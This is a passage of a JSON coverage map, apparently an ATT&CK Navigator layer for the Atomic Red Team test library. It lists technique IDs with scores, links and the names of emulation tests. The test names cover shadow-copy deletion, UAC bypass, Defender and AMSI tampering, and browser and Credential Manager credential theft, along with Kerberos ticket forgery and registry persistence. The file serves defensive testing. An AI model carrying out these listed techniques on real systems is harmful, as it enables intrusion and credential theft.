Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and 
LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":3,"enabled":true,"comment":"\n- Shutdown System - Windows\n- Restart System - Windows\n- Logoff System - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"comment":"\n- Change User Password - Windows\n- Delete User - Windows\n- Remove Account From Domain Admin Group\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"comment":"\n- Steal Firefox Cookies (Windows)\n- Steal Chrome Cookies (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"comment":"\n- Modify Fax service to run PowerShell\n- Service Installation CMD\n- Service 
Installation PowerShell\n- TinyTurla backdoor service w64time\n- Remote Service Installation CMD\n- Modify Service to Run Arbitrary Binary (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}],"comment":"\n- Persistence with Custom AutodialDLL\n- HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)\n- HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation)\n- WMI Invoke-CimMethod Start Process\n"},{"techniqueID":"T1546.001","score":1,"enabled":true,"comment":"\n- Change Default File Association\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"comment":"\n- Set Arbitrary Binary as Screensaver\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"comment":"\n- Persistence via WMI Event Subscription - CommandLineEventConsumer\n- Persistence via WMI Event Subscription - ActiveScriptEventConsumer\n- Windows MOFComp.exe Load MOF File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"comment":"\n- Netsh Helper DLL Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"comment":"\n- Attaches Command Prompt as a Debugger to a List of Target Processes\n- Replace binary of sticky keys\n- Create Symbolic Link From osk.exe to 
cmd.exe\n- Atbroker.exe (AT) Executes Arbitrary Command via Registry Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"comment":"\n- Create registry persistence via AppCert DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"comment":"\n- Install AppInit Shim\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"comment":"\n- Application Shim Installation\n- New shim database files created in the default shim database directory\n- Registry key creation and/or modification events for SDB\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"comment":"\n- IFEO Add Debugger\n- IFEO Global Flags\n- GlobalFlags in Image File Execution Options\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"comment":"\n- Append malicious start-process cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"comment":"\n- COM Hijacking - InprocServer32\n- Powershell Execute COM Object\n- COM Hijacking with RunDLL32 (Local Server Switch)\n- COM hijacking via TreatAs\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":38,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}],"comment":"\n- Add a driver\n"},{"techniqueID":"T1547.001","score":17,"enabled":true,"comment":"\n- Reg Key Run\n- Reg Key RunOnce\n- PowerShell Registry RunOnce\n- Suspicious vbs file run from startup Folder\n- Suspicious jse file run from startup Folder\n- Suspicious bat file run from startup Folder\n- Add Executable Shortcut Link to User Startup Folder\n- Add persistance via Recycle bin\n- SystemBC Malware-as-a-Service Registry\n- Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n- Change Startup Folder - HKCU Modify User Shell Folders Startup Value\n- HKCU - Policy Settings Explorer Run Key\n- HKLM - Policy Settings Explorer Run Key\n- HKLM - Append Command to Winlogon Userinit KEY Value\n- HKLM - Modify default System Shell - Winlogon Shell KEY Value \n- secedit used to create a Run key in the HKLM Hive\n- Modify BootExecute Value\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"comment":"\n- Authentication Package\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"comment":"\n- Create a new time provider\n- Edit an existing time provider\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"comment":"\n- Winlogon Shell Key Persistence - PowerShell\n- Winlogon Userinit Key Persistence - PowerShell\n- Winlogon Notify Key Logon Persistence - PowerShell\n- Winlogon HKLM Shell Key Persistence - PowerShell\n- Winlogon HKLM Userinit Key Persistence - PowerShell\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"comment":"\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa Security Support Provider configuration in registry\n- Modify HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig Security Support Provider configuration in registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Snake Malware Kernel Driver Comadmin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"comment":"\n- Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"comment":"\n- Shortcut Modification\n- Create shortcut to cmd in startup folders\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"comment":"\n- Add Port Monitor persistence in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - 
re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with 
Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using 
vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n- ESXi - Remove Syslog remote IP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":58,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove 
Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":10,"enabled":true,"comment":"\n- 
Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n- ESXi - Disable Firewall via Esxcli\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View 
